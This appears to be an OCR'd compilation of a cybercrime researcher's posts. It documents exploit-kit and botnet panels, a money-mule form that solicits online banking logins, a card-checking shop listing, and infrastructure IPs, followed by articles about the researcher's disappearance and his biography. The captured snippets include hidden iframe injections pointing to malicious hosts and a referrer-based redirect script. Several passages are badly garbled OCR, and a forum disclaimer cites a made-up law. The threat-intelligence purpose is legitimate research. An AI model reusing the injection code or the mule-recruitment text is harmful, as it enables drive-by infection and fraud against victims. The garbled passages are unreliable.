https://t.co/tuxftqFJxO https://t.co/cQseqXxOL62 


24 - Friday 


04:43 


https://t.co/HY4BPMWUN5 #security #cybercrime #malware #Threatintelligence 
#threatintell #threatintel 


10:08 
Happy Friday! https://t.co/LO42coTYnY 


25 - Saturday 

https://t.co/u260ZdaslS #security #cybercrime #malware #ThreatHunting 
#threatintell #threatintel #threatintelligence 

https://t.co/JTcqOaYgET https://t.co/mQRtzmDFXV 

08:29 
Using @MaltegoHQ even before it was cool. Case study: The Pay Per Install 
underground marketplace with outstanding results. Keep up the good work. 
https://t.co/robGVqiKMFO 

[Screenshot: botnet panel statistics - Total (3 days): 1569/0; Online: 1466/0; New bots (2 hours): 1569; New bots (24 hours): 1569; per-country breakdown] 

https://t.co/JTcqOaYgET https://t.co/Nq1lxICDbrA 


07:24:41] opening file neosploit.hits ... 
[2007-10-01 07:24:41] opening file neosploit.loads ... 
[2007-10-01 07:24:41] opening file neosploit.installs ... 
[2007-10-01 07:24:41] opening file neosploit.refs ... 
[2007-10-01 07:24:44] scheduled repairing of all databases ... 
[2007-10-01 07:24:45] repaired was successfully. 
[2007-10-01 07:24:45] congratulate! daemon has been started successfully! 
[2007-10-01 07:26:00] opening file neosploit.hits ... 
[2007-10-01 07:26:01] opening file neosploit.loads ... 
[2007-10-01 07:26:01] opening file neosploit.installs ... 
[2007-10-01 07:26:01] opening file neosploit.refs ... 
[2007-10-01 07:26:04] scheduled repairing of all databases ... 
[2007-10-01 07:26:04] repaired was successfully. 
[2007-10-01 07:26:04] congratulate! daemon has been started successfully! 
07:32:40] repairing of all databases with reset user Oxlad5beOd.. 
07:32:41] repaired was successfully. 

08:44 
https://t.co/JTcqOaYgET https://t.co/WOlYr7j40Ou 


Black Energy botnet status at 01:27:33 18.11.2008: 


08:50 
https://t.co/JTcqOaYgET https://t.co/FwWLHYpdcVK 


[Screenshot: statistics panel - Simple browser statistics, Main statistics, Exploit statistics] 


08:51 
https://t.co/JTcqOaYgET https://t.co/Ng6FThvqBF 




09:06 
https://t.co/JTIcqOaYgET https://t.co/EoO0wCnD9t5 


[Screenshot: "CC Checker - Batch Terminal" page in Mozilla Firefox] 


09:07 


https://t.co/JIcqOaYgET https://t.co/OFbKnpbr7y 


[Screenshot: "Browser Details" statistics table] 


09:07 
https://t.co/JTcqOaYgET https://t.co/NNS9OB1E1T 




09:08 


https://t.co/JTcqOaYgET https://t.co/PKpK1LAReHw 




09:10 


[Screenshot: Mozilla Firefox window, "SPLOITS 1.0" login page] 


https://t.co/JTcqOaYgET https://t.co/ZUMSFIDQ9A 


[Screenshot: spam advertisement template] 


09:11 
https://t.co/JTcqOaYgET https://t.co/WwQpXRs5Yt 




09:12 


https://t.co/JTcqOaYgET https://t.co/paVpxFxVwp 


[Screenshot: spam management panel - Marks, Search, Remove Selected, Remove All] 

09:17 


https://t.co/JTcqOaYgET https://t.co/92R4pjl4lf 


09:17 


Wellcome, root 


Admin tools: 


09:18 


[Screenshot: Limbo admin panel - Browsers, Total loads] 


https://t.co/JTcqOaYgET https://t.co/stITOPunwWO 




https://t.co/JTcqOaYgET https://t.co/JtTLNTdYph 


The good CAPTCHAs statistics are correct only if al 
have the rate CAPTCHA option enabled. otherwise it wi! 
Note: Click on an operator to see ! 

free cell phone directory 

cell phone service plans cellular phones will work in nearly any area you can be 
reached and notified of any immediate problem and you can also call for 
assistance if needed for any medical or mechanical problem 

It also will close the door on one of the last vestiges of tranquility available to 
many of cell phone service plans 

Increasing numbers of parents are choosing to buy mobile phones for their 
children as a way of keeping in touch and they cell phone service plans looking 
for a responsible service offering provided by a trusted brand, said Attila 
Gazdag, managing director, the Walt Disney Internet Group Europe. cell phone 
service plans phone was turned off later that day and I never heard from then 
again since. Having to learn a new vocabulary for every issue is getting to be a 
strain 

cell phone service plans some reason, that doesnt sound all that cool to me 
Whatever airtime plan you choose, be cell phone service plans to watch out for 
hidden charges 

https://t.co/JTcqOaYgET https://t.co/KF2g2QSvCV 


<base href="http://www.eyewonder.com/" /><meta http-equiv="content-type" content="text/html; charset=utf-8" 
<!-- Post Click Tracking Location: EyeWonder_HomePage EyeWonder_HomePage --> 
<script type="text/javascript"> 
<!-- 
var dd = new Date(); 
var ord = Math.round(Math.abs(Math.sin(dd.getTime())) * 1000000000) * 10000000; 
var fd_pct_src = new String("<scr"+"ipt src=\"http://adsfac.us/pct_mx.asp?L=235288&source=js&ord="+ord+"\" t 
document.write(fd_pct_src); 
--> 
</script> 
<noscript> 
</noscript> 
<!-- END --> 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-trans 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> 
<!-- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> --> 
<TITLE>EyeWonder :: Interactive Digital Advertising, Rich Media Ads, Video Ads, Flash Ads, Online Advertisin 
<meta name="keywords" content="eye wonder, eyewonder, eye-wonder, iwonder, rich, media, richmedia, rich medi 
<meta name="description" content="EyeWonder is Interactive Digital Advertising's fastest-growing innovator, 
<META NAME="PUBLISHER" CONTENT="EyeWonder Inc."> 
<META NAME="COPYRIGHT" CONTENT="Copyright 2008 by EyeWonder Inc."> 
<META NAME="REVISIT-AFTER" CONTENT="7 days"> 
<META NAME="author" CONTENT="EyeWonder Inc."> 
<META NAME="ROBOTS" CONTENT="ALL"> 
<link href="index.css" rel="stylesheet" type="text/css" /> 
<script language="javascript">AC_FL_RunContent = 0;</script> 
<script src="AC_RunActiveContent.js" language="javascript"></script> 
</head> 

trisem.com 
rtrishest.com 

[Screenshot: FRAGUS panel - Statistics | Files | Traffic links | Preferences | Logout] 

[Screenshot: blacklist-checking service, interface text translated from Russian] 
Check an IP for presence in the SpamHaus lists 
IP: Check 
Check a domain for presence in the Google (firefox) blacklist 
Domain: Check 
Automatic checking of domains for presence in the blacklists of SpamHaus, Google (firefox) 
Status: Google, SpamHaus 
Add new domain: 
ICQ for notifications: 


19:15 
https://t.co/JTcqOaYgET https://t.co/rCOjYxKBPe 
19:15 

// abc1 and abc2 are base URLs defined above this excerpt; their values are cropped in the screenshot ("ht 65.234.1) 
var ss = '' + location.search; 
if ((location.search).length>0) abc = abc1; else abc = abc2; 

// Map of referring social network -> landing page on the redirector host 
var redirects = [ 
['tagged.com', abc+'tg.php'], 
['friendster.com', abc+'fr.php'], 
['myspace.com', abc+'ms.php'], 
['msplinks.com', abc+'ms.php'], 
['myyearbook.com', abc+'yb.php'], 
['fubar.com', abc+'fu.php'], 
['twitter.com', abc+'tw.php'], 
['hi5.com', abc+'hi5.php'], 
['bebo.com', abc+'be.php'] 
]; 
var s = '' + document.referrer, r = false; 
// Pick the landing page that matches the visitor's referrer 
for (var i = 0; i < redirects.length; i++) { 
if ((s.indexOf(redirects[i][0]) != -1)) { 
var redir = redirects[i][1] + location.search; 
if ((location.search).length>0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host; 
location.href = redir; 
r = true; 
break; 
} 
} 
// No known referrer: fall back to the default page 
if (!r) location.href = abc+'index.php'+ location.search; 


19:18 


https://t.co/JTcqOaYgET https://t.co/ePLWdOZHV6 


19:19 

[00:00] Mixx (~df@p 123.kmtn.m) left #icqhackers. 
[00:00] sancho[NhT] (~sancho[N @ppp 153-233. dialup. mtu-net.mu) left #icqhackers. 
[00:01] Heel: Hung xenm: MoxHO 1M KOMMMAUTS NepnoBcKue palinu B EXE-mauKu? 
[00:01] qt froSt (frost2k@194.158.219.88) left irc: Ping timeout: 190 seconds 
[00:01] Network (~Net@217.113.16.49) joined #icqhackers. 
[00:02] KrotReal (krotreal@ip-534. dialup. cl. spb.ru) left #icqhackers. 
[00:03] Heel: oi - a¥ 
[00:03] Tlecex: 7 
[00:03] #icqhackers: mode change ‘tv Ileceu' by iFudliFud@spacoom.com 

boomer-110809.com 
glavnij20090809.com 85.234.128.0/19 AS29550 
85.234.141.92 
piupiu-110809.com 85-234-141-92 static.as29550.net 
$uz11082009.com 

I'm feeling uncomfortable giving you my online banking details. Why do you need it? I'm worrying about unauthorized access to my 
bank account 

Online Banking Details 
URL http:/ 
Login 
Password 
Next Step Skip This Step Back 
* At this moment we require online access to your bank account optionally but strongly recommend to apply with online banking 
details. NOTE: 
higher priority on getting new tasks (amounts are also larger) 
$100 BONUS to base salary every month 

19:25 
https://t.co/JTcqOaYgET https://t.co/mspHOJz0Zm 


19:26 
https://t.co/JTcqOaYgET https://t.co/JxTVWi0icZ 




19:26 
https://t.co/JIcqOaYgET https://t.co/yAU9PqO005Q 


VIEW MESSAGE 

Message From/Date (GMT) 

Supervisor Welcome! 
09.01.2009 18:49:39 Dear John Blackmore 

We welcome you as a new employee. Reply Trash 

Sincerely, 
Personnel Supervisor 


19:26 


https://t.co/JTcqOaYgET https://t.co/uyrPZHM1Ih 


You have new message. John Blackmore 

Tasks | Messages | My money | My Profile | Documents | Official invoices | Help | Quit 

19:27 
https://t.co/JTcqOaYgET https://t.co/22VErFB6WP 


CARAMBOLAG 


Home reverseSocks Passwords SpamMail 


Country Stats Bot Statis 


19:27 
https://t.co/JTcqOaYgET https://t.co/Za6g5MqqGa 

Spam start 
Proxy User 
Message setup 
Recipients & SmtpLogins 
Write Message 


19:29 
https://t.co/JIcqOaYgET https://t.co/7IZFjmATqO 

Information: 
Current use 
GMT 

Statistics: 


19:29 
ate (dd.rnemn 


IP-addresses 


Search string 


as text (text/plain 


https://t.co/JTcqOaYgET https://t.co/nVmuCvGuio 


freq: 4800 
packetsize: 

Bots OM 35 
bots per hour: 37 
bots per day: 49 
all bots: 49 

426A9F: 3 
503032: 2 
crypter: 44 

TCP size: 
spoof sender IP: 
attack mode: 
max sessions: (for 'drop by timeout') 

Nickname: 
Rank: 
User ID: 
Log out 

1 visitor online 

stop 

Refresh rate: (in minutes) 


19:30 
https://t.co/JTcqOaYgET https://t.co/dYcq5ineDQ
19:31


https://t.co/JTcqOaYgET https://t.co/Fyfu22DE84 
Zeuhosting.me CP - Mozilla Firefox


CP :: Summary statistics 


‘otal reports in database: | 414] 
Prime of first activity: Jo2.09.2009 44716157] 
frotal bots: dG 
100.00% - 98 
Minienal version of bots 00 T 2S 
version of bot: be t-2.5-1] 




19:31 
https://t.co/JTcqOaYgET https://t.co/F4O0jqDelUf 


TS.132.211.12/OxIE8 (view /comvole*yeu/?g0 

</center>
<br>

<br>


height: 100px; z-index:1; visibility: hidden;"


<iframe src="http://ttt20091124.info/oko/help.html" width="1" height="1"></iframe>


=>


<!-- counter here -->
</div>


</body>
</html>


19:35 
https://t.co/JTcqOaYgET https://t.co/CNuW7ZsOxg 


<div id="Layer1" style="position: absolute; left: 0px; top:0px; width: 100px;


<iframe src="http://el3x.cn/teatl3/index.php" width="1" height="1"></iframe>
26 - Sunday 
01:35 
https://t.co/JTcqOaYgET https://t.co/olfzqcudzO 
Main menu | Tasks | Help
Add DDoS task: HTTP
Add DDoS task: ICMP
Add DDoS task: IGMP
Add DDoS task: UDP
01:36 


https://t.co/JTcqOaYgET https://t.co/9u6TcRjlaE 
simple stats | advanced stats | config | clear


OS stats Simple browser stats Exploit stats 


os Visits Exploited Percent || Browser Visits Exploited Percent || Exploit Exploited 
Windows XP. ; 123 2% Vi 3 186 35,09% || IE MDAC 
Windows XP SP2 252 109 129% x 23 43 18.3% IE Snapshot 


Windows Vista 6 H Oper. ‘8 18 23,08% PDF 


Windows 98 = 0% Other 0 0 0% PDF vis 


Windows 2000 

Windows 2003 

Windows NT 4 100% 
Other 0 0% 
Linux 0% 


Windows 3 1 0% 


https://t.co/JTcqOaYgET https://t.co/tooMV3Q5qp


Sup 
As you know GhostMarket.Net has been down for quite a while now, let me tell you why and what's going down 
So firstly the Domain - GhostMarket.Net has been Disabled by my domain provider 
I emailed them asking why it was and asking if there was any chance of re-enabling it, they've told me this 
We received a notification from the FBI that your domain has been used in fraudulent activities. This is a violation of of our 
Service Agreement, so your domain and account have been disabled 
So the Domain is pretty much Fucked, I could get a new domain - GhostMarket.cc and a new host and start it up again but some 
serious shit went down! 
Snapper, the last Host for GM, was raided by a Cyber Team from London and he tells me they most likely have access to GM and 
have dumped the Database, so I hope u guys used Protection 
They were also asking him about me, I'm probably the Most Wanted Cyber Criminal right now so I gotta keep Underground for a
while 
So I'm not sure GM will be ever alive again, at least until the heat has died down 
I hope that GM has helped members to meet new people and do successful business with others and that you can understand Big 
Shit is Poppin
Remember guys and girls, to be a Legend Carder, u gotta be a Ghost ;) 
Watch your back, and Fuck the Police! 


You can always email me at 
MSN - 


DISCLAIMER: Government, RIAA, ANTI-Malware, Antivirus, ANTI-Piracy & Goverment Related Groups: By entering, you are 
violating code 943.611.03 of the Internet Privacy Act signed by Bill Clinton in 1995. Therefore you CANNOT threaten our ISP(s), 
person(s) or company(s) storing these file(s) or using this server and cannot prosecute. Please leave this server now as you are 
violating our Terms Of Use & Service and will be taken to court. All html, php, text, documents, pages, words, images on this 
website are for informational purposes only, if you wish to use this information for illegal use then only you are to blame for your 
actions 


01:38 
https://t.co/JTcqOaYgET https://t.co/qkVT28ga24 


Parcel 


Solutions that you need! 


01:39 
https://t.co/JTcqOaYgET https://t.co/UXTuGixhn5 


01:40 
https://t.co/JTcqOaYgET https://t.co/NCB9CwhSxXI 
YES Exploit System


Statistics


Your IP address


Domain listed in MDL: Absent
Domain listed in Google Safe Browsing: Absent
Domain listed in McAfee TrustedSource


Domain listed in MalwareURL


01:40 
https://t.co/JTcqOaYgET https://t.co/3LBxf2purh 


YES Exploit System


01:41 


https://t.co/JTcqOaYgET https://t.co/r1l3UYxjcO 
01:41


01:43 


https://t.co/JTcqOaYgET https://t.co/HDPFfpFWrH 


http://artguide.co.il/267/q.


Resolving artguide.co.il... 62.128.52.211
Connecting to artguide.co.il[62.128.52.211]:80... connected
HTTP request sent, awaiting response... 302 Found


Hddanchev blog: 


connected 


https://t.co/JTcqOaYgET https://t.co/J7Wdnp3Ds1 
hacked by zhjt.
china 
Long live the Peoples Republic of China 




01:44 
https://t.co/JTcqOaYgET https://t.co/S2b1MU0p6g 




01:48 
https://t.co/JTcqOaYgET https://t.co/AtqTqRopc6 
01:49
https://t.co/JTcqOaYgET https://t.co/SYalkZb8lu 


Default preferences: 


Ajax check before use next exploit: Default exploits: 


aolwinamp directshow 


Default file to load: 


-- Random file v ms09002 snapshot 


com spreadsheet 


Save preferences 


01:49 
https://t.co/JTcqOaYgET https://t.co/vyViMoc9Gx 
Stats botnet


Be ts. = Country 24hour ts. =© Country Stats ~=—s All Stats 


Refresh | Clear stats | Clear all


All bots: 

OnLine/OffLine: 

Active 12hours: 

Active 24hours: 

Country: 

All Task: 
Work/Stop Task: 0 (0%) / 0 (0%)


01:54 


https://t.co/JTcqOaYgET https://t.co/ViT8ktwkWQ


partnership program «Earning4u» 


from 6$ to 1805 


Registration 
To register in our service please fill in the form.
All the fields marked * are to be filled
After you have finished filling the form and clicking "Register"
you agree with our "Rules"


Your account nummer 
01:54
https://t.co/JTcqOaYgET https://t.co/cGwer4ZV3B 


95.143.192.43 -- 95.143.192.0/20 -- AS49770

net

ns1.installsmarket.net

ns2.installsmarket.net


01:55 
https://t.co/JTcqOaYgET https://t.co/3Fh59GHmPH 


95.143.192.41 -- 95.143.192.0/20 -- AS49770

biz
installsforyou.biz

ns2.installsforyou.biz -- 94.75.207.53 hosted-by.leaseweb.com

ns1.installsforyou.biz -- 94.75.207.22

94.75.192.0/18 AS16265


01:55 
https://t.co/JTcqOaYgET https://t.co/Qfe485eHYm 


ns2.installsdealer.com

installsdealer.com

95.143.192.42
95.143.192.0/20 -- AS49770

ns1.installsdealer.com


01:55 
https://t.co/JTcqOaYgET https://t.co/inavdUQENe 


ns2.loadssell.net

95.143.192.44

95.143.192.0/20 -- AS49770

ns1.loadssell.net




01:56 
https://t.co/JTcqOaYgET https://t.co/p4ybKHwpYr 


ns2.mchost.ru -- 94.103.88.3

94.103.93.3 -- 94.103.88.0/21
ns1.mchost.ru

AS48172

1.smtp-in.mail.mchost.ru -- 95.142.39.21

95.142.32.0/21

2.smtp-in.mail.mchost.ru -- 95.142.39.22

95.142.35.50

shared10.mchost.ru


01:57 
https://t.co/JTcqOaYgET https://t.co/OlplsWj7BK 
CRUSADE-AFFILIATES


01:58 
https://t.co/JTcqOaYgET https://t.co/JTaNN5t663 
elseif (strpos($_SERVER['HTTP_USER_AGENT'], 'Mac')) {


"<title> Ama
folder_re
"<img src=".


02:29 
https://t.co/JTcqOaYgET https://t.co/vdmoymRrmB 


dns1.naunet.ru -- 193.227.240.37

193.227.240.38 -- 193.227.240.0/23 -- AS35718

dns2.naunet.ru
193.227.241.60

installs4sale.net

61.61.20.133 -- 61.61.16.0/21

mail.installs4sale.net

net


02:29 
https://t.co/JTcqOaYgET https://t.co/RTTKMiC6kr 
02:30
https://t.co/JTcqOaYgET https://t.co/S5pdvLOwJZd


Ftes Total 


02:32 
https://t.co/JTcqOaYgET https://t.co/LDd7DclsCV 




02:33 
https://t.co/JTcqOaYgET https://t.co/dtSytYW8MU 


91.213.93.0/24

mail.bgpvpn.kz -- 91.213.93.10
PTR
core.bgpvpn.kz

ns.bgpvpn.kz

ns.smallshopkz.org -- 195.78.123.1 -- 195.78.122.0/23 -- AS31366


02:34 
https://t.co/JTcqOaYgET https://t.co/45vuoz8xHP 


02:35 
https://t.co/JTcqOaYgET https://t.co/QVEh3osfl4 
dailyppi


02:36 
https://t.co/JTcqOaYgET https://t.co/Nm8MvKvzZ8 
Asap Financial Group. A Decade of Superannuation Experience


02:36 
https://t.co/JTcqOaYgET https://t.co/IVOopg70A0
Phoenix Exploit's Kit


02:40 
https://t.co/JTcqOaYgET https://t.co/ns0O2z22i7X 
Thu, 20 May 2010 19:20:38 +0400
31 seconds before reload


Captchas posted per last minute: 2
Min time to solve captcha: 00:18

Max time to solve captcha: 02:55
Avg time to solve captcha: 01:36
Records in @ 13

Queries from clients per last minute: 0
Queries from clients in this minute: 0


2010-05-20 19:19:29 2010-05-20 19:24:29 2010-05-20 19:20:29 
Ins 4S 2010-05-20 19:20:10 2010-05-20 19:25;10 2010-05-20 19.20.30 Si) 0000-09-00 00,00,00 | 0000-00-00 09,00.00 


02:45 
https://t.co/JTcqOaYgET https://t.co/zcYSBuPcPx 
02:46


*1 


MAIN + REFRESH + REFERRERS + 


unique hits 


os 

windows 95 
windows nt 
windows 98 
windows me 
windows 2k 
windows 2k3 
windows xp 


windows vista 


overall stats 


loads 


exploit stats 


pdf libtiff mdac 


os stats 


hits 


0 (0 loads 


top countries 


hits 


* BLACKLIST CHECK + iFRAME+ CLEAR STATS + SETTINGS + LOGOUT 


exploit rate 


aggressive 


0 (0 loads 


https://t.co/JTcqOaYgET https://t.co/oTZRXbt9UU 
Tasks

Add Task

Template for SPAM Task

Select Senders List

Select Servers List


04:44 


*3 


God bless. https://t.co/aDBDVFyvot 
27 - Monday


01:20 


https://t.co/JTcqOaYgET https://t.co/N3QIcJT3Ex 
Sprott Asset Management


Registration 


Sprott Asset Management 


01:21 
https://t.co/JTcqOaYgET https://t.co/hS8mwYV9uj 
Employee Registration - Step 4


I'm feeling uncomfortable giving you my online banking details. Why do you need it? I'm worrying about unauthorized access to my 
bank account. 


We require online banking access to monitor deposits coming from our clients. It saves you much time and increase your rating in our 
system: 


- There is no need to check your bank account every hour during transactions, your personal supervisor will do it instead of you! You'll be informed 
the same minute funds arrive

- No need to send us your bank account statement every week (maybe 2-3 times a week)

- We trust you much more, you'll receive money bonuses and more transactions! 


It is absolutely safe and legal. We guarantee that all personal details will stay safe. Please read our Privacy Policy. NOTE: IT'S
IMPOSSIBLE TO MAKE ANY TRANSFERS USING ONLINE ACCESS. If you have no online access to your bank account, you should contact 
your bank and activate this service. It will take less than 10 minutes. 


Online Banking Details 

URL: http://
Login:
Password:


Next Step Skip This Step | Back 


* At this moment we require online access to your bank account optionally but strongly recommend to apply with online banking 
details. NOTE: 


- agents with online access will have higher priority on getting new tasks (amounts are also larger)
- agents with online access receive $100 BONUS to base salary every month


01:23 
Blackhole STATISTICS THREADS FILES SECURITY SETTINGS


oo re) oo = CEz= AsTootmoanese: 5 com. {i} 


CTATHCTKA CTPAMBI XT = XOCTAN S| JATPYRGH se 
3A Bee rervon 4 3.71 %, tam Russian Federaton 45655 38050 4860 12.7 @ 
63915.0m — S3153x0crs GP 7287 2arvremn necens alata a 
( Seons 2092 1099 323 19.01 
== (G@ Kazakhstan 1124 036 173 16. = 
3a CETOMHA 13.69% O Other county 926 843 93 11.03 @ 
29045 sore 25463 xoctw 487 wren & necene [i Moldova, Republic of 360 326 Bh 1.0 @ 
— fe Germany 32 313 7? 5.47 @ 
= ure 331 285 25 3.77 @ 
BPAY3EPtE xNTeE = XOCT | BATPY3KM (4% © tered a9 172 » 5.61 @ 
© era > 3570 2709 %* a7 a jm Estos 21 171 5 8.77 @ 
© Frefox » 24 HTB 7231 © Y 
@ Sofi 7 4 3s 761 @ 
@ Mom > 98 87 15 7. ew eee SASPEN 190 
@ SE > 182 0 2 Me SE weex 2380 3.25 
@ Crome > 2 2 0 0.00 ere 2130 27 7 
WE woes > 18% no 7 
oc xNTA = XOCTEA «= BAFPYBKN: G S wore > 19 a eZ 
RY Wedows 3645139042337 19.77 = wx > t 0.01 © 
@ Wedows 7 zee8 200881004 sor @ 
oO Widows Vets ou M19 me 6 © noTrom Th xOCTHI? «BATPYE 6% 
Check a card


We refund your balance automatically f you are checking CC j f 
s You does not get moneyback for this CC yet 
Joes not marked for a checking at checkout page 
a Y buy this CC not later then in 1 hour before checking 
Notice: f you wil get 57 response ard ked f au King ar 
ard cost and f later card wil be marked as invalid by our checker you wil get moneyback for this 


The price for a 1 card checking is $0,30


Card 
number: 


Your previous checks 


You have not check any card yet. 
BINS: Country: Bank: Code: Level: Credit/Debit: Type: Base:
_ (+$1) ($1.5) (+$1) 
| [Any (216()98) [Any (216188) [Any (21606) (M4) [Any (21606) [Any (21606) ) [Any M) [usa b2t1 


Cards found: 2283 
461100 owi2 UNITED STATES OF | SMMONS FIRST CLASSIC cesar 101 TRieTR2 $15.00 cr 
| AMERICA NATIONAL BANK 
461100 owi2 UNITED STATES OF | SMIMONS FIRST CLASSIC oear 101 TRI-TR2 $1.00 tr 
AMERIKA NATIONAL BANK 
’ tT t | 
461100 owi2 UNITED STATES OF | SMMONS PRST cLasse oear 101 TRI-TR2 $18.00 | 
AMERIKA NATIONAL BANK 
427178 owi2 UNITED STATES OF | REGIONS BANK PLATINUM oer 101 TRI-TR2 $36.00 iG 
ANERCA 
427178 owl2 UNITED STATES OF | REGIONS BANK PLATINUM cer 101 TRI-TR2 $36.00 r 
AMERICA 
427178 owi2 UNITED STATES OF | REGIONS BANK PLATINUM cesT 101 TRI-TR2 $30.00 r 
ANERICA 
hilary kneber @hilarykneber - 16 Jan 2011
#DANCHO DANCHEV Does anyone know ..Is there a way I can determine the
exact date that Dancho Danchev began to "unfollow" me?
So, what this means is that any individual's success in the industry comes down to things like reputation, how well you
can bullshit, etc. But ultimately we have no way to differentiate, say, Bruce Schneier, who has a long academic- and 
professional-grade track record and a habit of writing in a highly intellectual fashion on difficult topics, from Dancho 
Danchev, who is a random Russian dude very few people know anything about, who posts random snippets of facts that 
pass for “analysis.” 
Proxy Search | List Proxys | 24h Proxys List | Account Settings | PHelp Settings | Billing | Check Your IP
& Hourly Socks Stats 


icq : 623333 - now online , sorry was out of country , now working . Wellcome 


https://t.co/JTcqOaYgET https://t.co/I96aPvbIicb 


The case of Dancho Danchev's going missing is now beginning to turn into a story of either potential mental
illness, or, that of a classic tale of Bulgarian secret services removing a problem. It would seem that today, 


after Dancho’s being missing since September, reports are coming out that he was in fact in a mental health 
cei eeo@twuecemcricse The story is still coming to light, but, the case does present some interesting 
ideas for anyone in the information security business like Dancho or others (@ioerror etc) who might poke 
certain forces in the eye with their research and reporting. 


In the case of Dancho, he seemed to be indicating by the email sent before his disappearance, that he felt he 
was being surveilled electronically as well as perhaps physically. The images in the email are not conclusive of 
anything that would indicate a bug or surveillance system had been placed in his house. However, this is not 
to say that the inverter that he found could not have been used in some way for such a system. Usually such 
bugs are small and powered by batteries or, in the case of the higher tech ones, piggyback off the power of 
the phone lines or hard wire electrical systems. Depending on the power requirements though, the inverter 
may have indeed been something that was used to alter power for operational function. 


Surveillance technology aside, the fact is that Dancho, whose blog I am only now coming aware of, does have
some potential information that could have poked the wrong badger. The badger in this case would be 
Eastern bloc baddies who are making money off of botnets and malware that Dancho was revealing in his 
ZDnet blog and his blogspot. He perhaps hit a little too close to home for someone and they just made a call 
to the state security apparatus. Or, maybe in fact, he has begun to manifest symptoms of schizoid behavior, 
he is after all, in the right age range to do so. However, given a read through his writings online, I cannot at
present see anything that leads me to believe that he is manifesting a mental illness here. His postings are 
cogent and have none of the aphasia characteristics that would lead anyone to believe he is ill. 
An article on Bulgarian news website "Dnevnik" reports that security researcher Dancho
Danchev was placed in a mental hospital in early December of last year.


Danchev, an information security researcher and author, was reported as missing since late 
summer 2010, according to an article in New Zealand based ZDNet. 


Danchev was thought to have disappeared under mysterious circumstances after an unnamed source revealed they 
had received a letter in September of 2010 in which Danchev outlined concerns that he may be under surveillance 
from the Bulgarian government and could face prosecution. 


Circumstances surrounding Danchev's apparent admission to a mental hospital are unclear, but a rough translation 
of the Dnevnik article on Danchev's institutionalization is as follows:


Dancho Danchev, an expert on cybersecurity, is accommodated in a Bulgarian hospital. The information was 
confirmed by two sources of "Diary", although from the hospital refused comment. 


As Wired magazine announced a few days ago, he disappeared in September 2010 and did not meet their 
coordinates. Twenty-six year old Dancho Danchev writes for the blog Zero Day, part of the news site zdnet.com. His 
last post there is from August 2010 


In early September, sent an e-mail to the editors of zdnet.com , informing them that the bathroom he installed 
listening devices. in addition, attached photos of the electric transformer and torn wires on the bulbs. In his letter 
Dancho Danchev said that the Bulgarian intelligence services monitor it because it was recommended by the FBI 
Attaché in Sofia for an expert in the local center against computer threats. 


Then keep track of Dancho Danchev disappear, but according to reliable source of "Diary" he hospitalized from 
December 11 onwards. It is now stabilized and will soon be discharged, our source said. 


Expect more details 


"Dancho's alive but he's in a lot of trouble," the source was quoted as saying.


Dancho Danchev is a highly reputable malware researcher and blogger who has made significant contributions to
the information security field. 


24th of November 


ashiyane Brno «fA 
Facepook © 


Nima Salehi 


@ 


nima.salehi@yahoo.com 
Shadowserver is influenced by: certbund, BSI_Presse, CERT_at, botherder

Shadowserver is influencing: securityfreax, dvk@iuk, BattIefists, TeMerc, certbund 
OperationLeakS is influencing: quinnnt856, TheNiceBot, CopRecordings, zwa3049, whatsinanameyou
Cryptome
@Cryptome_

Featured at RSA Europe, CyberCamp, InfoSec, GCHQ and 

Interpol Dancho Danchev continues to actively produce threat 

intelligence at the industry's leading threat intelligence blog. 

Archive: 

archive.org/download/danch... 

@cryptome_org 
05:37

https://t.co/JTcqOaYgET CC: @briankrebs https://t.co/laHfOQU7ch
maza.cc:555/showthread.php?t=43108 

; 551807916 
sal@jabber.sg 

Dancho Danchev sucked it and he will eventually suck it too. 
I’m not doing this as my hobby. 

you think I’m afraid of anything? I have no time to be afraid. 
I’m working. 
05:39


Russian OSINT


Interview with OSINT specialist Dancho Danchev. We did not manage to get detailed answers to every question, but the overall message is clear. Cybercrime is progressing, ransomware is the main trend of 2021, and the USA is still at odds with Russia.
Contents of the interview:

- Who is Dancho?
- What is he known for?
- Working for U.S Law Enforcement and the U.S Intelligence Community
- OSINT operation "Uncle George"
- Cybercrime Forum Data Set of 16 GB
- Ransomware and Darkweb
- REvil's profits
- "Russia remains the main breeding ground of cybercrime"
- Cybercrime in the CIS


https://telegra.ph/Intervyu-s-hakerom-Dancho-Danchev-04-12


Telegraph

Interview with Bulgarian hacker Dancho Danchev, especially for Russian OSINT: Cybercrime in 2021

Name: Dancho Danchev Occupation: information security researcher, OSINT specialist Specialization: Cybercrime, Darknet && OSINT Country: Bulgaria Website: ddanchev.blogspot.com Twitter: https://twitter.com/dancho_danchev Russian OSINT: Dancho, tell us a little....
Dancho Danchev


Dancho Danchev is the world’s leading expert in the field of 
cybercrime fighting and threat intelligence gathering having 
actively pioneered his own methodology for processing 
threat intelligence leading to a successful set of hundreds 
of high-quality analysis and research articles published at 
the industry's leading threat intelligence blog - ZDNet's Zero 
Day, Dancho Danchev's Mind Streams of Information Security 
Knowledge and Webroot's Threat Blog with his research 
featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, 
TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine 
currently producing threat intelligence at the industry's 
leading threat intelligence blog - Dancho Danchev's - Mind 
Streams of Information Security Knowledge which has 
received over 5.6M page views since December, 2005 and 
is currently considered one of the security industry's most 
popular security publications. 


- Presented at the GCHQ with the Honeynet Project 

- SCMagazine Who to Follow on Twitter for 2011 

- Participated in a Top Secret GCHQ Program called “Lovely 
Horse” 

- Identified a major victim of the SolarWinds Attack - 
PaloAltoNetworks 

- Found malware on the Web Site of Flashpoint 

- Tracked monitored and profiled the Koobface Botnet and 
exposed one botnet operator 

- Made it to Slashdot two times 

- My Personal Blog got 5.6M Page Views Since December, 
2005 


- My old Twitter Account got 11,000 followers 

- I had an average of 7,000 RSS readers on my blog

- I have my own vinyl “Blue Sabbath Black Cheer / Griefer -
We Hate You / Dancho Danchev Suck My Dick” made by a 
Canadian artist 

- Currently running Astalavista, box.sk 

- I gave an interview to DW on the Koobface Botnet 

- I gave an interview to NYTimes on the Koobface botnet

- I gave an interview to Russian OSINT

- Listed as a major competitor by Jeffrey Carr's Taia Global 
- Presented at the GCHQ 

- Presented at Interpol 

- Presented at InfoSec 

- Presented at CyberCamp 

